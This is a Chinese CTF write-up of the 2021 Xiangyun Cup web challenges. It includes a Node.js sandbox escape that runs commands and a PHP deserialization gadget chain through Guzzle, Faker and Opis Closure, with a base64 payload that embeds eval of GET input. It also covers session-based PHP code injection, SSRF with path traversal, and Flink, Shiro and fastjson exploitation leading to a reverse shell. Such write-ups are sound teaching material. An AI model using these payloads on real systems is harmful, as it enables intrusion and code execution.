解题过程
crawler_z
注册登录
更新信息获得token
bucket更新为服务器地址
带token访问verify
服务器写入代码
<script>
// Escape from an evaluated-JS context to the host Node.js process: the
// constructor chain yields Function, which returns `process`; from there
// child_process is loaded and a command is run, its output written to the page.
// NOTE(review): the sandbox this runs in is not shown — presumably a vm-style
// evaluator inside the crawler; `vm` is not a security boundary.
// Mitigation: never evaluate untrusted script in the same process as
// privileged code; use an isolated worker/container without child_process,
// and alert on child_process use from a rendering component.
document.write(this.constructor.constructor.constructor('return process')().mainModule.require("child_process").execSync("/readflag").toString());
</script>
最后访问bucket
ezyii
Exp:
<?php
// PoC for the "ezyii" challenge: builds an object graph that, once
// unserialize()d by the target, chains through third-party classes
// (Codeception, Faker, Guzzle PSR-7, Opis Closure) to reach code execution.
// NOTE(review): namespace separators (`\`) appear to have been stripped by
// page extraction; the base64 blob below spells the same class names intact.
// Defender's view: the root cause is unserialize() on attacker-controlled
// input. Mitigate with json_decode, or unserialize($s, ['allowed_classes' => false]),
// and keep gadget-bearing dev libraries (Codeception, Faker) out of production.
namespace CodeceptionExtension{
use FakerDefaultGenerator;
use GuzzleHttpPsr7AppendStream;
// Entry gadget. Property names, visibility and declaration order must stay
// exactly as written: they define the serialized form (e.g. "\0*\0output").
class RunProcess{
protected $output;
private $processes = [];
public function __construct(){
$this->processes[]=new DefaultGenerator(new AppendStream());
$this->output=new DefaultGenerator('jiang');
}
}
// Emits the payload; the only output of this script.
echo base64_encode(serialize(new RunProcess()));
}
namespace Faker{
// Stand-in for the library class: only the property layout is reproduced.
class DefaultGenerator
{
protected $default;
public function __construct($default = null)
{
$this->default = $default;
}
}
}
namespace GuzzleHttpPsr7{
use FakerDefaultGenerator;
// Stand-ins for the Guzzle PSR-7 stream classes; again only property layout.
final class AppendStream{
private $streams = [];
private $seekable = true;
public function __construct(){
$this->streams[]=new CachingStream();
}
}
final class CachingStream{
private $remoteStream;
public function __construct(){
$this->remoteStream=new DefaultGenerator(false);
// `$stream` is not declared above, so this creates a dynamic (public)
// property — deprecated since PHP 8.2 — which serializes as plain "stream".
$this->stream=new PumpStream();
}
}
final class PumpStream{
private $source;
private $size=-10;
private $buffer;
public function __construct(){
$this->buffer=new DefaultGenerator('j');
// Loads opis/closure so the closure can be wrapped as a serializable object.
include("closure/autoload.php");
$a = function(){system('cat /fla*');};
// Serialize then unserialize so $source holds a SerializableClosure instance,
// which is what ends up embedded (as a C: record) in the final payload.
// NOTE(review): the closure body in the base64 blob below appears to differ
// from this one; the blob was evidently generated from a separate run.
$a = OpisClosureserialize($a);
$b = unserialize($a);
$this->source=$b;
}
}
}
base64生成的参数
TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjI6e3M6OToiACoAb3V0cHV0IjtPOjIyOiJGYWtlclxEZWZhdWx0R2VuZXJhdG9yIjoxOntzOjEwOiIAKgBkZWZhdWx0IjtzOjU6ImppYW5nIjt9czo0MzoiAENvZGVjZXB0aW9uXEV4dGVuc2lvblxSdW5Qcm9jZXNzAHByb2Nlc3NlcyI7YToxOntpOjA7TzoyMjoiRmFrZXJcRGVmYXVsdEdlbmVyYXRvciI6MTp7czoxMDoiACoAZGVmYXVsdCI7TzoyODoiR3V6emxlSHR0cFxQc3I3XEFwcGVuZFN0cmVhbSI6Mjp7czozNzoiAEd1enpsZUh0dHBcUHNyN1xBcHBlbmRTdHJlYW0Ac3RyZWFtcyI7YToxOntpOjA7TzoyOToiR3V6emxlSHR0cFxQc3I3XENhY2hpbmdTdHJlYW0iOjI6e3M6NDM6IgBHdXp6bGVIdHRwXFBzcjdcQ2FjaGluZ1N0cmVhbQByZW1vdGVTdHJlYW0iO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO2I6MDt9czo2OiJzdHJlYW0iO086MjY6Ikd1enpsZUh0dHBcUHNyN1xQdW1wU3RyZWFtIjozOntzOjM0OiIAR3V6emxlSHR0cFxQc3I3XFB1bXBTdHJlYW0Ac291cmNlIjtDOjMyOiJPcGlzXENsb3N1cmVcU2VyaWFsaXphYmxlQ2xvc3VyZSI6MTg0OnthOjU6e3M6MzoidXNlIjthOjA6e31zOjg6ImZ1bmN0aW9uIjtzOjI5OiJmdW5jdGlvbigpe2V2YWwoJF9HRVRbJ2EnXSk7fSI7czo1OiJzY29wZSI7czoyNjoiR3V6emxlSHR0cFxQc3I3XFB1bXBTdHJlYW0iO3M6NDoidGhpcyI7TjtzOjQ6InNlbGYiO3M6MzI6IjAwMDAwMDAwMzIyMWZjMmEwMDAwMDAwMDBlNjc3MjcyIjt9fXM6MzI6IgBHdXp6bGVIdHRwXFBzcjdcUHVtcFN0cmVhbQBzaXplIjtpOi0xMDtzOjM0OiIAR3V6emxlSHR0cFxQc3I3XFB1bXBTdHJlYW0AYnVmZmVyIjtPOjIyOiJGYWtlclxEZWZhdWx0R2VuZXJhdG9yIjoxOntzOjEwOiIAKgBkZWZhdWx0IjtzOjE6ImoiO319fX1zOjM4OiIAR3V6emxlSHR0cFxQc3I3XEFwcGVuZFN0cmVhbQBzZWVrYWJsZSI7YjoxO319fX0=
post传入data获得flag
安全检测
进入后台,存在ssrf
传入http://127.0.0.1/admin/include123.php得到源码
这个过滤测试下来只能使用session
首先在url传入
http://www.baidu.com/?1=<?php+system('/getfla?.sh');?>
获取session并记录
然后在地址栏输入
http://www.baidu.com/?1=<?php+system('/getfla?.sh');?>
获得flag
层层穿透
打开题目链接发现是Apache Flink Dashboard
搜索RCE漏洞上传jar包后弹shell到msf,扫描内网发现http://10.10.1.11:8080存在附件的web服务,端口转发出来后分析附件代码,发现存在fastjson反序列化漏洞,不过需要绕过waf,/admin路由可以用shiro的权限绕过漏洞,/admin/test/即可
查看lib存在C3P0 jar包
于是利用https://github.com/depycode/fastjson-c3p0 的回显payload读取flag
admin_secret
/api/files接口可以写入files表,用目录穿越来绕过主键filename,同时,必须是本地才能访问,这里利用pdf依赖包的一个ssrf,需要写入到PDF中,但是content又过滤了 `<>` ,这里用数组绕过
content[]=<iframe%20src%3d"http%3a//127.0.0.1:8888/api/files%3fusername%3dadmin%26filename%3d./xxx/../flag%26checksum%3dbe5a14a8e504a66979f6938338b0662c"><iframe>
下载文件得到flag
/api/files/be5a14a8e504a66979f6938338b0662c
本文始发于微信公众号(山石网科安全技术研究院):2021第二届祥云杯WEB部分Write-Up
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。